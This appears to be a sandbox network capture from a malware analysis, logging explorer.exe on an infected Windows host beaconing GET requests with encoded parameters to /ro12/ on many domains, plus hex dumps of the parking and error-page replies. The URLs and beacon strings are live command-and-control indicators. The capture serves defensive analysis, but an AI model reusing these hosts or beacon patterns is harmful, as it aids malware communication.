Oct 11, 2023 22:56:51.372406960 CEST	210	IN	Data Raw: 74 65 78 74 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 69 6d 70 72 69 6e 74 5f 5f 63 6f 6e 74 65 6e 74 2d 6c 69 6e 6b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 3b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 Data Ascii: text,.container-imprint__content-link{font-size:10px;color:#949494}.container-contact-us{text-align:center}.container-contact-us__content{display:inline-block}.container-contact-us__content-text,.container-contact-us__content-link{font-size:10
Oct 11, 2023 22:56:51.372458935 CEST	211	IN	Data Raw: 6c 20 2e 33 73 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 61 6c 6c 20 2e 33 73 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 6e 64 6f 77 5f 5f 63 6f 6e 74 65 6e 74 2d 68 65 61 64 65 72 7b 66 6f Data Ascii: l .3s;transition:all .3s;text-align:center}.cookie-modal-window__content-header{font-size:150%;margin:0 0 15px}.cookie-modal-window__content{text-align:initial;margin:10% auto;padding:40px;background:#fff;display:inline-block;max-width:550px}.
Oct 11, 2023 22:56:51.372513056 CEST	212	IN	Data Raw: 33 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 6d 65 64 69 75 6d 7d 2e 62 74 6e 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 73 6d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 38 63 39 35 39 63 3b 62 6f 72 64 65 72 2d 63 Data Ascii: 3;color:#fff;font-size:medium}.btn--secondary-sm{background-color:#8c959c;border-color:#8c959c;color:#fff;font-size:initial}.btn--secondary-sm:hover{background-color:#727c83;border-color:#727c83;color:#fff;font-size:initial}.switch input{opaci
Oct 11, 2023 22:56:51.372566938 CEST	214	IN	Data Raw: 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 63 6f 6e 74 61 69 6e 65 72 2d 72 65 6c 61 74 65 64 6c 69 6e 6b 73 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 63 6f 6e Data Ascii: auto !important}.container-content__container-relatedlinks,.container-content__container-ads,.container-content__webarchive{width:30%;display:inline-block}.container-content__container-relatedlinks{margin-top:47px;flex-grow:1;width:60px}.conta
Oct 11, 2023 22:56:51.372622967 CEST	215	IN	Data Raw: 20 30 20 35 70 78 20 30 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 69 6d 61 67 65 7b 63 6f 6e 74 65 6e 74 3a 75 72 6c 28 22 Data Ascii: 0 5px 0;display:inline-block}.two-tier-ads-list__list-element-image{content:url("//img.sedoparking.com/templates/images/bullet_justads.gif");float:left;padding-top:32px}.two-tier-ads-list__list-element-content{display:inline-block}.two-tier-a
Oct 11, 2023 22:56:51.372678041 CEST	216	IN	Data Raw: 65 2c 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 66 6f 63 75 73 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 62 6f 64 79 7b 6d 61 72 67 69 6e Data Ascii: e,.webarchive-block__list-element-link:focus{text-decoration:underline}body{margin:0}.domain h1{font-size:2.2em;font-weight:normal;text-decoration:none;text-transform:lowercase;color:#949494}#container-domain{display:block;text-align:center}.n
Oct 11, 2023 22:56:51.690574884 CEST	218	IN	Data Raw: 37 39 72 64 45 63 78 6e 72 2b 68 61 72 33 75 41 3d 3d 22 2c 22 74 69 64 22 3a 33 31 38 30 2c 22 62 75 79 62 6f 78 22 3a 66 61 6c 73 65 2c 22 62 75 79 62 6f 78 54 6f 70 69 63 22 3a 74 72 75 65 2c 22 64 69 73 63 6c 61 69 6d 65 72 22 3a 74 72 75 65 Data Ascii: 79rdEcxnr+har3uA==","tid":3180,"buybox":false,"buyboxTopic":true,"disclaimer":true,"imprint":false,"searchbox":true,"noFollow":false,"slsh":false,"ppsh":true,"dnhlsh":true,"toSellUrl":"","toSellText":"","searchboxPath":"//www.start399.com/park

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.11.20	50024	208.91.197.39	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 11, 2023 23:00:57.133284092 CEST	246	OUT	GET /ro12/?pR-=rtUgTuNL7uL+LGGSpkT0QUDqa6bNuU9c/oVzs0vN/XeiV6RFY6H23yk7imnqF7CC5MmR&Wx=ChSLGhh0Mn9TylKP HTTP/1.1 Host: www.ps212naming.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 11, 2023 23:00:57.410998106 CEST	246	IN	HTTP/1.1 403 Forbidden Date: Wed, 11 Oct 2023 21:00:57 GMT Server: Apache Content-Length: 302 Content-Type: text/html; charset=UTF-8 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 61 72 63 68 69 76 65 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 62 6f 74 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 73 6e 69 70 70 65 74 22 20 2f 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 61 6c 69 67 6e 3d 63 65 6e 74 65 72 3e 0d 0a 3c 68 33 3e 45 72 72 6f 72 2e 20 50 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 64 69 73 70 6c 61 79 65 64 2e 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 72 20 73 65 72 76 69 63 65 20 70 72 6f 76 69 64 65 72 20 66 6f 72 20 6d 6f 72 65 20 64 65 74 61 69 6c 73 2e 20 20 28 32 37 29 3c 2f 68 33 3e 0d 0a 20 20 20 20 3c 21 2d 2d 2d 20 31 30 32 2e 31 32 39 2e 31 34 35 2e 33 32 2d 2d 2d 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta name="robots" content="noarchive" /><meta name="googlebot" content="nosnippet" /></head><body><div align=center><h3>Error. Page cannot be displayed. Please contact your service provider for more details. (27)</h3> ...- 102.129.145.32---></div></body></html>
Oct 11, 2023 23:00:57.620256901 CEST	247	IN	HTTP/1.1 403 Forbidden Date: Wed, 11 Oct 2023 21:00:57 GMT Server: Apache Content-Length: 302 Content-Type: text/html; charset=UTF-8 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 61 72 63 68 69 76 65 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 62 6f 74 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 73 6e 69 70 70 65 74 22 20 2f 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 61 6c 69 67 6e 3d 63 65 6e 74 65 72 3e 0d 0a 3c 68 33 3e 45 72 72 6f 72 2e 20 50 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 64 69 73 70 6c 61 79 65 64 2e 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 72 20 73 65 72 76 69 63 65 20 70 72 6f 76 69 64 65 72 20 66 6f 72 20 6d 6f 72 65 20 64 65 74 61 69 6c 73 2e 20 20 28 32 37 29 3c 2f 68 33 3e 0d 0a 20 20 20 20 3c 21 2d 2d 2d 20 31 30 32 2e 31 32 39 2e 31 34 35 2e 33 32 2d 2d 2d 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta name="robots" content="noarchive" /><meta name="googlebot" content="nosnippet" /></head><body><div align=center><h3>Error. Page cannot be displayed. Please contact your service provider for more details. (27)</h3> ...- 102.129.145.32---></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.11.20	50025	18.119.154.66	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 11, 2023 23:01:17.694616079 CEST	248	OUT	GET /ro12/?pR-=uAil5XdBoZ+2CkbxeHQt0E2a6PqX6RKuOQ+ejqYxtKGY7TwYTqnnbJE3/J+NrU/b1JZc&Wx=ChSLGhh0Mn9TylKP HTTP/1.1 Host: www.pwpholdings.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 11, 2023 23:01:17.927550077 CEST	248	IN	HTTP/1.1 302 Found content-length: 0 date: Wed, 11 Oct 2023 21:01:17 GMT location: https://www.hugedomains.com/domain_profile.cfm?d=pwpholdings.com connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.11.20	50026	34.120.249.181	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 11, 2023 23:02:00.232801914 CEST	249	OUT	GET /ro12/?3fY=-ZkX&pR-=YIi7nDQw6o4IM6Y7GVEqMnWSon2sCGETt9fQ5s5Vu4Y8lCbsapzjTWOCPxSAe4pqXmXo HTTP/1.1 Host: www.55dy5s.top Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 11, 2023 23:02:00.549660921 CEST	249	IN	HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Wed, 11 Oct 2023 21:02:00 GMT Content-Type: text/html Content-Length: 5208 Last-Modified: Wed, 11 Oct 2023 10:00:52 GMT Vary: Accept-Encoding ETag: "65267254-1458" Cache-Control: no-cache Accept-Ranges: bytes Via: 1.1 google Connection: close
Oct 11, 2023 23:02:00.551999092 CEST	251	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true
Oct 11, 2023 23:02:00.552156925 CEST	252	IN	Data Raw: 61 72 20 6f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 6e 3d 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 2e 73 75 62 73 74 72 28 31 29 7c 7c 22 22 29 2e 73 70 6c 69 74 28 22 26 22 29 2c 6f 3d 7b 7d 2c 65 Data Ascii: ar o=function(){for(var n=(window.location.search.substr(1)\|\|"").split("&"),o={},e=0;e<n.length;e++){var r=n[e].split("=");o[r[0]]=r[1]}return function(){return o}}();function e(){var n=window.navigator.userAgent.toLowerCase();return n.indexOf
Oct 11, 2023 23:02:00.557723045 CEST	253	IN	Data Raw: 22 3d 3d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 77 69 6e 64 6f 77 2e 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 75 63 77 65 62 3f Data Ascii: "===function(){var n=window.navigator.userAgent.toLowerCase();return window.ucweb?"android":n.match(/ios/i)\|\|n.match(/ipad/i)\|\|n.match(/iphone/i)?"iphone":n.match(/android/i)\|\|n.match(/apad/i)?"android":window.ucbrowser?"iphone":"unknown"}()&&
Oct 11, 2023 23:02:00.557792902 CEST	255	IN	Data Raw: 61 73 74 43 68 69 6c 64 29 2c 24 73 63 72 69 70 74 31 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 65 2e 73 65 74 41 Data Ascii: astChild),$script1.onload=function(){var e=document.createElement("script");e.setAttribute("crossorigin","anonymous"),e.setAttribute("src","//image.uc.cn/s/uae/g/01/welfareagency/js/vconsle.js"),$head.insertBefore(e,$head.lastChild)};break}}</
Oct 11, 2023 23:02:00.557837009 CEST	255	IN	Data Raw: 72 63 3d 22 68 74 74 70 73 3a 2f 2f 69 6d 61 67 65 2e 75 63 2e 63 6e 2f 73 2f 75 61 65 2f 67 2f 33 6f 2f 62 65 72 67 2f 73 74 61 74 69 63 2f 61 72 63 68 65 72 5f 69 6e 64 65 78 2e 33 36 39 61 36 36 33 62 30 38 61 35 35 64 33 30 35 62 39 37 2e 6a Data Ascii: rc="https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.369a663b08a55d305b97.js"></script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.11.20	50027	104.247.82.94	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 11, 2023 23:02:19.557969093 CEST	256	OUT	GET /ro12/?pR-=TUQv1xq+sor4G/cf0NME9zAsbR56SjOR/AikpQZ6liEkkl3DXF9T0sERNIDZexcZDDH8&3fY=-ZkX HTTP/1.1 Host: www.senior-living-91799.bond Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 11, 2023 23:02:19.800935984 CEST	256	IN	HTTP/1.1 403 Forbidden Server: nginx Date: Wed, 11 Oct 2023 21:02:19 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Oct 11, 2023 23:02:20.008392096 CEST	257	IN	HTTP/1.1 403 Forbidden Server: nginx Date: Wed, 11 Oct 2023 21:02:19 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.11.20	50028	52.20.84.62	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 11, 2023 23:02:39.898715019 CEST	257	OUT	GET /ro12/?3fY=-ZkX&pR-=LGYu0+ofLQhP7724nJ/BQ1gFrbGvfVPqmQuS2LiwheVAxFjzT3VG9Q3bfEwRvtUKPFG/ HTTP/1.1 Host: www.riderarea.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 11, 2023 23:02:40.132421970 CEST	258	IN	HTTP/1.1 302 Moved Temporarily Server: openresty Date: Wed, 11 Oct 2023 21:02:40 GMT Content-Type: text/html Content-Length: 142 Connection: close Location: https://domains.squadhelp.com/lpd/name/www.riderarea.com Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.11.20	50029	158.247.235.89	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 11, 2023 23:03:21.518776894 CEST	259	OUT	GET /ro12/?3fY=-ZkX&pR-=gjAFVEeeiH9OAOPDCKjXPtqfGvq//Fy/v54m7kKmQemvHE2y+/COmLQxuu8r1C37UwGV HTTP/1.1 Host: www.ktrandnews.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 11, 2023 23:03:21.828180075 CEST	259	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 11 Oct 2023 21:03:21 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.ktrandnews.com/ro12/?3fY=-ZkX&pR-=gjAFVEeeiH9OAOPDCKjXPtqfGvq//Fy/v54m7kKmQemvHE2y+/COmLQxuu8r1C37UwGV Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.11.20	50016	104.18.233.42	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 11, 2023 22:57:11.130716085 CEST	229	OUT	GET /ro12/?pR-=dJqi3gPkjgABca74pxnHJ2flNeCuOiIkF0IIcqv13LRvEaAIYFadFLyq9bv/k+1Q0EDq&Wx=ChSLGhh0Mn9TylKP HTTP/1.1 Host: www.niaeoer.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 11, 2023 22:57:11.300649881 CEST	229	IN	HTTP/1.1 409 Conflict Date: Wed, 11 Oct 2023 20:57:11 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 16 Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 814a03951bd008aa-LAX Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 30 31 Data Ascii: error code: 1001

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.11.20	50017	3.64.163.50	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 11, 2023 22:57:51.976587057 CEST	230	OUT	GET /ro12/?pR-=uQgh28/mwUTAreWLWMvWctCpaYYKSPk/RTU2hG/2GkXh2eCF81faGnz4QbuRWtjyYx7X&Wx=ChSLGhh0Mn9TylKP HTTP/1.1 Host: www.qualityquickprints.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 11, 2023 22:57:52.296363115 CEST	231	IN	HTTP/1.1 410 Gone Server: openresty Date: Wed, 11 Oct 2023 20:57:52 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 35 36 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 71 75 61 6c 69 74 79 71 75 69 63 6b 70 72 69 6e 74 73 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 7<html>9 <head>56 <meta http-equiv='refresh' content='0; url=http://www.qualityquickprints.com/' />a </head>8</html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.11.20	50018	34.120.249.181	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 11, 2023 22:58:13.359546900 CEST	232	OUT	GET /ro12/?pR-=YIi7nDQw6o4IM6Y7GVEqMnWSon2sCGETt9fQ5s5Vu4Y8lCbsapzjTWOCPxSAe4pqXmXo&Wx=ChSLGhh0Mn9TylKP HTTP/1.1 Host: www.55dy5s.top Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 11, 2023 22:58:13.678128958 CEST	232	IN	HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Wed, 11 Oct 2023 20:58:13 GMT Content-Type: text/html Content-Length: 5208 Last-Modified: Wed, 11 Oct 2023 10:00:52 GMT Vary: Accept-Encoding ETag: "65267254-1458" Cache-Control: no-cache Accept-Ranges: bytes Via: 1.1 google Connection: close
Oct 11, 2023 22:58:13.679874897 CEST	234	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true
Oct 11, 2023 22:58:13.679963112 CEST	235	IN	Data Raw: 61 72 20 6f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 6e 3d 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 2e 73 75 62 73 74 72 28 31 29 7c 7c 22 22 29 2e 73 70 6c 69 74 28 22 26 22 29 2c 6f 3d 7b 7d 2c 65 Data Ascii: ar o=function(){for(var n=(window.location.search.substr(1)\|\|"").split("&"),o={},e=0;e<n.length;e++){var r=n[e].split("=");o[r[0]]=r[1]}return function(){return o}}();function e(){var n=window.navigator.userAgent.toLowerCase();return n.indexOf
Oct 11, 2023 22:58:13.680073977 CEST	236	IN	Data Raw: 65 6e 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 75 63 77 65 62 3f 22 61 6e 64 72 6f 69 64 22 3a 6e 2e 6d 61 74 63 68 28 2f 69 6f 73 2f 69 29 7c 7c 6e 2e 6d 61 74 63 68 28 2f 69 70 61 64 2f 69 29 7c Data Ascii: ent.toLowerCase();return window.ucweb?"android":n.match(/ios/i)\|\|n.match(/ipad/i)\|\|n.match(/iphone/i)?"iphone":n.match(/android/i)\|\|n.match(/apad/i)?"android":window.ucbrowser?"iphone":"unknown"}()&&navigator.sendBeacon?send(s+="&is_beacon=1")
Oct 11, 2023 22:58:13.680154085 CEST	237	IN	Data Raw: 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 63 72 6f 73 73 6f 72 69 67 69 6e 22 2c 22 61 6e 6f 6e 79 6d 6f 75 73 22 29 2c 65 2e 73 65 74 41 74 74 Data Ascii: ocument.createElement("script");e.setAttribute("crossorigin","anonymous"),e.setAttribute("src","//image.uc.cn/s/uae/g/01/welfareagency/js/vconsle.js"),$head.insertBefore(e,$head.lastChild)};break}}</script><title></title><script>var fontSize=w
Oct 11, 2023 22:58:13.680197954 CEST	238	IN	Data Raw: 69 63 2f 61 72 63 68 65 72 5f 69 6e 64 65 78 2e 33 36 39 61 36 36 33 62 30 38 61 35 35 64 33 30 35 62 39 37 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: ic/archer_index.369a663b08a55d305b97.js"></script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.11.20	50019	130.185.109.77	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 11, 2023 22:59:14.631130934 CEST	239	OUT	GET /ro12/?pR-=YvLwEHT7dF3wqOWcBoJhBcwDYJ3uuNfwUzugM5jE2WtwH9yjz4WpnbfVNhN3mQxE4RMu&Wx=ChSLGhh0Mn9TylKP HTTP/1.1 Host: www.holzleisten24.shop Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 11, 2023 22:59:14.946597099 CEST	239	IN	HTTP/1.1 404 Not Found Server: nginx/1.6.2 Date: Wed, 11 Oct 2023 20:59:14 GMT Content-Type: text/html Content-Length: 168 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.6.2</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.11.20	50020	154.12.93.8	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 11, 2023 22:59:35.376043081 CEST	240	OUT	GET /ro12/?pR-=0LOFVeHqsrMeo4L+dmJBR/0B/c0sqVoEg1WVw/8t1mjD3B4IGyZiGj+5uErL3J0wPr7A&Wx=ChSLGhh0Mn9TylKP HTTP/1.1 Host: www.xlrj.asia Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 11, 2023 22:59:35.545150042 CEST	241	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 11 Oct 2023 20:59:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
